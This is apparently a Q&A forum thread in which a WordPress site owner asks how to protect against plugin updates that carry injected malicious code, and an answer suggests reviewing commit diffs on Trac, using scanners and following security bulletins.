One of the most popular WordPress plugins listed on the WordPress plugins database got malicious code injected into it recently (April 2013):
http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html
A similar thing happened in 2011:
http://blog.sucuri.net/2011/06/wordpress-plugins-hacked-understanding-the-backdoor.html
How do I protect against updating my WordPress sites with the latest of the plugins and being done with it? Are there any security bulletins that I could subscribe to that list these latest compromises and when patches come out?
1 Answer
The security of plugin updates via .org really falls on the shoulders of WordPress to provide a secure repository and method for plugin authors to safeguard assets.
Since 2011 they have improved the system for notification on plugin changes, so plugin authors are notified when their code is altered, this is a good change though it can be argued that additional steps should be implemented.
In order to compromise a .org plugin you would have to compromise the plugin authors computer and password or perform a MITM attack.
On your end you don’t have that many options.
1.. You can manually check the differences committed to the plugin update by browsing the code on trac. Click on “Developers” , browse to Trac and then click “”View changes” by selecting 2 commits.
For example on trac comparing 2 commits of the Jetpack plugin.
The downside is that you have to know how to read code.
2.. You can try a malware scanning pluging, this will not be very effective since anyone with commit access would not be dumb enough to commit code that would be easily detected.
I run wpsecure.net and try to keep it up to date, but it pulls info from various security bulletins, namely secunia.com , osvdb.org and exploit-db.com.
